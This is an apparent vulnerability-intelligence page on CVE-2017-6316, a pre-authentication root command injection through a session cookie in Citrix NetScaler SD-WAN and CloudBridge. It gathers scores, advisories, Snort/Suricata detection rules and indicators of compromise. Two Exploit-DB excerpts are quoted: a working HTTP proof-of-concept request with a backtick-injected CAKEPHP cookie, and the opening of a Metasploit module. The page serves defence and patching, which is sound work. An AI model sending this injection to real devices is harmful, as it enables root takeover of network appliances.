CVE-2017-6316
published 2017-07-20CVE-2017-6316: Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On…
PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
72.60%
99.4th percentile
Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | citrix_adm | — | — |
| citrix | citrix_hypervisor | — | — |
| citrix | citrix_virtual_apps_and_desktops | — | — |
| citrix | endpoint_management | — | — |
| citrix | netscaler_adc | — | — |
| citrix | netscaler_adc_gateway | — | — |
| citrix | netscaler_gateway | — | — |
| citrix | netscaler_sd-wan | <= 9.1.2.26.561201 | — |
| citrix | sd-wan | — | — |
| citrix | xenserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Outbound)"; flow:established,to_server; urilen:13; http.method; content:"POST"; http.uri; content:"/global_data/"; fast_pattern; http.cookie; content:"`"; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2017-6316; classtype:attempted-admin; sid:2029164; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2017_6316, deployment Perimeter, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_10_26;)
- →Detect POST requests to /global_data/ with backtick characters in the Cookie header (CGISESSID), which indicates command injection attempt.
- →Monitor for POST requests to /cgi-bin/login.cgi with a CAKEPHP cookie value containing backtick-wrapped shell commands (CloudBridge devices). ↗
- →Alert on POST to /login with username field containing backtick-wrapped commands (SD-WAN Center variant via UsersController.php). ↗
- →Watch for creation or execution of dropped ELF payloads at /tmp/m or /tmp/n following exploitation, especially via sudo. ↗
- →The Snort/ET rule (sid:2029164) keys on: POST method, URI length of exactly 13 bytes (/global_data/), and backtick in the cookie — all three together are a strong signal.
- ·The vulnerable cookie name differs by product: CGISESSID on NetScaler SD-WAN appliances, CAKEPHP on CloudBridge (former name) devices. Detection rules must cover both cookie names. ↗
- ·A related but distinct unauthenticated RCE exists in SD-WAN Center (10.2.0.136.733315) via the username POST parameter to /login — not the cookie — requiring separate detection logic. ↗
- ·The ET Snort rule (sid:2029164) is tuned for outbound traffic ($HOME_NET -> $EXTERNAL_NET) and a URI length of exactly 13 bytes; perimeter placement is recommended per rule metadata.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9f8x-323m-6vw4: Citrix NetScaler SD-WAN devices through v9
ghsa_unreviewed·2022-05-17
CVE-2017-6316 [CRITICAL] CWE-20 GHSA-9f8x-323m-6vw4: Citrix NetScaler SD-WAN devices through v9
Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.
VulnCheck
Citrix Multiple Products Remote Code Execution Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-6316 [CRITICAL] CWE-20 Citrix Multiple Products Remote Code Execution Vulnerability
Citrix Multiple Products Remote Code Execution Vulnerability
A vulnerability has been identified in the management interface of Citrix NetScaler SD-WAN Enterprise and Standard Edition and Citrix CloudBridge Virtual WAN Edition that could result in an unauthenticated, remote attacker being able to execute arbitrary code as a root user. This vulnerability also affects XenMobile Server.
Affected: Citrix NetScaler SD-WAN Enterprise, CloudBridge Virtual WAN, and XenMobile Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada; https://w
CISA
Citrix Multiple Products Remote Code Execution Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2017-6316 [CRITICAL] CWE-20 Citrix Multiple Products Remote Code Execution Vulnerability
Vulnerability: Citrix Multiple Products Remote Code Execution Vulnerability
Affected: Citrix NetScaler SD-WAN Enterprise, CloudBridge Virtual WAN, and XenMobile Server
A vulnerability has been identified in the management interface of Citrix NetScaler SD-WAN Enterprise and Standard Edition and Citrix CloudBridge Virtual WAN Edition that could result in an unauthenticated, remote attacker being able to execute arbitrary code as a root user. This vulnerability also affects XenMobile Server.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-6316
Remediation Due Date: 2022-04-15
Citrix
CVE-2017-6316: Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On
vendor_citrix·2017-07-20·CVSS 9.8
CVE-2017-6316 [CRITICAL] CVE-2017-6316: Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On
CVE-2017-6316: Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.
CISA KEV: A vulnerability has been identified in the management interface of Citrix NetScaler SD-WAN Enterprise and Standard Edition and Citrix CloudBridge Virtual WAN Edition that could result in an unauthenticated, remote attacker being able to execute arbitrary code as a root user. This vulnerability also affects XenMobile Server.
Required Action: Apply updates per vendor instructions.
Citrix
Citrix Security Bulletin CTX225990
vendor_citrix·CVSS 9.8
CVE-2017-6316 [CRITICAL] Citrix Security Bulletin CTX225990
Citrix Security Bulletin CTX225990
CVE References: CVE-2017-6316, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Suricata
ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Outbound)
suricata·2019-12-16·CVSS 9.8
CVE-2017-6316 [CRITICAL] ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Outbound)
ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Outbound)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Outbound)"; flow:established,to_server; urilen:13; http.method; content:"POST"; http.uri; content:"/global_data/"; fast_pattern; http.cookie; content:"`"; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2017-6316; classtype:attempted-admin; sid:2029164; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2017_6316, deployment Perimeter, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, u
Suricata
ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Inbound)
suricata·2019-12-16·CVSS 9.8
CVE-2017-6316 [CRITICAL] ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Inbound)
ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Inbound)
Rule: alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Inbound)"; flow:established,to_server; urilen:13; http.method; content:"POST"; http.uri; content:"/global_data/"; fast_pattern; http.cookie; content:"`"; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2017-6316; classtype:attempted-admin; sid:2029165; rev:2; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2017_6316, deployment Perimeter, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_a
Exploit-DB
Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection
exploitdb·2017-07-19
CVE-2017-6316 Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection
Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection
---
POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
action=logout
Exploit-DB
Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
exploitdb·2017-07-19
CVE-2017-6316 Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
---
# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: https://www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 4.6)
#
# CVE : (awaiting cve)
# vuln: CGISESSID Cookie parameter
# associated vuln urls:
# /global_data/
# /global_data/headerdata
# /log
# /
# /r9-1-2-26-561201/configuration/
# /r9-1-2-26-561201/configuration/edit
# /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
#
# Description PreAuth Remote Root Citrix SD-WAN 'Citrix SD-WAN CGISESSID Cookie Remote Root',
'Description' => %q{
This modul
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Threat Research Center
Threat Research
Malware
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Tenable
Critical OS Command Injection Vulnerability in Citrix SD-WAN Center Discovered
blogs_tenable·2019-04-11
Critical OS Command Injection Vulnerability in Citrix SD-WAN Center Discovered
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Citrix SD-WAN Center and NetScaler SD-WAN Center Unauthenticated Remote Command Injection
blogs_tenable·2019-04-10
Citrix SD-WAN Center and NetScaler SD-WAN Center Unauthenticated Remote Command Injection
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://www.securityfocus.com/bid/99943http://www.securitytracker.com/id/1039019https://support.citrix.com/article/CTX225990https://www.exploit-db.com/exploits/42345/https://www.exploit-db.com/exploits/42346/http://www.securityfocus.com/bid/99943http://www.securitytracker.com/id/1039019https://support.citrix.com/article/CTX225990https://www.exploit-db.com/exploits/42345/https://www.exploit-db.com/exploits/42346/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-6316
2017-07-20
Published
2022-03-25
Added to CISA KEV
Exploited in the wild